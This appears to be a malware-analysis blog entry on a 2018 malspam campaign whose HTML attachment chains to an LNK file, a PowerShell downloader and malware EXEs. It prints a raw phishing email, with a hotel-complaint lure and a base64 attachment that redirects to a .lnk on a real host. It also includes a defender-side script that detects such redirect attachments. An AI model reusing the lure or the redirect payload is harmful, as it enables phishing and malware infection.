2018-08-21 - MALSPAM USING HTML ATTACHMENTS --> LNK FILES FOR WINDOWS INFECTIONS

ASSOCIATED FILES:

NOTES:

  • Malspam --> HTML attachment --> stat44.lnk --> wget1.ps1 --> malware EXE files from e-bookstore.eu

WEB TRAFFIC BLOCK LIST

Indicators are not a block list.  If you feel the need to block web traffic, I suggest the following URL and domain:

EMAILS

MALSPAM EXAMPLES FROM 2018-08-21:

MALSPAM SAMPLE:

Received: from ([85.244.107.244]) by [removed] for [removed];
        Tue, 21 Aug 2018 13:23:25 +0000 (UTC)
From: "Gerardo Elliott" <marchdor@
[recipient's email domain]>
Subject: I need to make a complaint about booking number 436533272266388.
To:
[removed]
Content-Type: multipart/mixed; boundary="1d7RDSqWTrvjr7FCc=_Sx0i4OkaQJgenMW"
MIME-Version: 1.0
Date: Tue, 21 Aug 2018 14:23:28 +0100
Priority: urgent
X-Priority: 1

This is a multi-part message in MIME format

--1d7RDSqWTrvjr7FCc=_Sx0i4OkaQJgenMW
Content-Type: text/html; charset="ISO-8859-1"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

<!DOCTYPE html>
<html>
<head>Good afternoon, my name is Gerardo Elliott
</head>
<body>
        I have a complaint to be made on the days between 4/14/2018 to 4/16/2018 stay at Arizona Inn was all paid in cash, but I left my final card 4785 Visa for additional expenses in which it was not necessary , today I received the invoice and there is a debit in the amount of 420 dollars on behalf of Arizona Inn I would like immediate refund, because my invoice and direct debit and has already been paid.
I await the return of your part in attachment sending the proof of debit with the statement of undue debit.
        </body>
</html>

--1d7RDSqWTrvjr7FCc=_Sx0i4OkaQJgenMW
Content-Type: application/octet-stream;
        name="statement.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
        filename="statement.html"

DQoNCg0KPG1ldGEgaHR0cC1lcXVpdj0icmVmcmVzaCIgY29udGVudD0iMDsgdXJsPWh0dHA6Ly8x
ODUuMjA2LjE0Ni41OC90ZXN0L3N0YXQ0NC5sbmsiPg0K

--1d7RDSqWTrvjr7FCc=_Sx0i4OkaQJgenMW--
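As an added defender-side example (not part of this page or its associated files), the Python script below parses a message laid out like the sample above, lets the MIME parser undo the base64 encoding of the "HTML" attachment, and flags any attachment whose content is a meta-refresh redirect, noting whether the target is a .lnk file as in this chain. The sender, message text and the 203.0.113.10 host are constructed placeholders, not values from the actual malspam.

```python
import base64
import re
from email import message_from_string

# Constructed test message modelled on the malspam sample: a decoy HTML body plus an
# "HTML" attachment (declared application/octet-stream, base64) that is really a
# <meta http-equiv="refresh"> redirect to a .lnk. 203.0.113.10 is a placeholder host.
REDIRECT_TAG = b'<meta http-equiv="refresh" content="0; url=http://203.0.113.10/test/stat44.lnk">'
SAMPLE_EMAIL = """\
From: "Sender Name" <sender@example.invalid>
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="ISO-8859-1"

<html><body>Decoy complaint text asking the recipient to open the attachment.</body></html>

--b1
Content-Type: application/octet-stream; name="statement.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="statement.html"

""" + base64.b64encode(REDIRECT_TAG).decode() + "\n--b1--\n"

# Meta-refresh tag with its url= target captured (attribute order as in the sample).
META_REFRESH = re.compile(
    r'<meta[^>]*http-equiv\s*=\s*["\']?refresh["\']?[^>]*content\s*=\s*["\']?'
    r'\s*\d+\s*;\s*url\s*=\s*([^"\'>\s]+)',
    re.IGNORECASE,
)

def find_html_redirect_attachments(raw_email: str) -> list:
    """One finding per attachment named *.htm/*.html whose decoded content is a
    meta-refresh redirect. Filename, not MIME type, decides what counts as HTML,
    because the sample mislabels the part as application/octet-stream."""
    findings = []
    for part in message_from_string(raw_email).walk():
        if part.get_content_disposition() != "attachment":
            continue  # skips multipart containers and the inline decoy body
        filename = part.get_filename() or ""
        if not filename.lower().endswith((".htm", ".html")):
            continue
        decoded = part.get_payload(decode=True) or b""  # base64 is undone here
        match = META_REFRESH.search(decoded.decode("latin-1", errors="replace"))
        if match:
            url = match.group(1)
            findings.append({"filename": filename, "redirect_url": url,
                             "lnk_target": url.lower().split("?", 1)[0].endswith(".lnk")})
    return findings
```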

TRAFFIC

TRAFFIC FROM AN INFECTED WINDOWS HOST:

MALWARE

MALWARE FROM AN INFECTED WINDOWS HOST:

WINDOWS REGISTRY UPDATE FROM THE INFECTED WINDOWS HOST:

IMAGES


Shown above:  Screenshot from one of the emails.

Shown above:  Traffic from an infection filtered in Wireshark.

Shown above:  Traffic from an infection shown in the Fiddler web debugger.

Shown above:  Script wget1.ps1 returned from e-bookstore.eu.

Shown above:  Malware persistent on an infected Windows host.

FINAL NOTES

Once again, here are the associated files:

Zip archives are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.
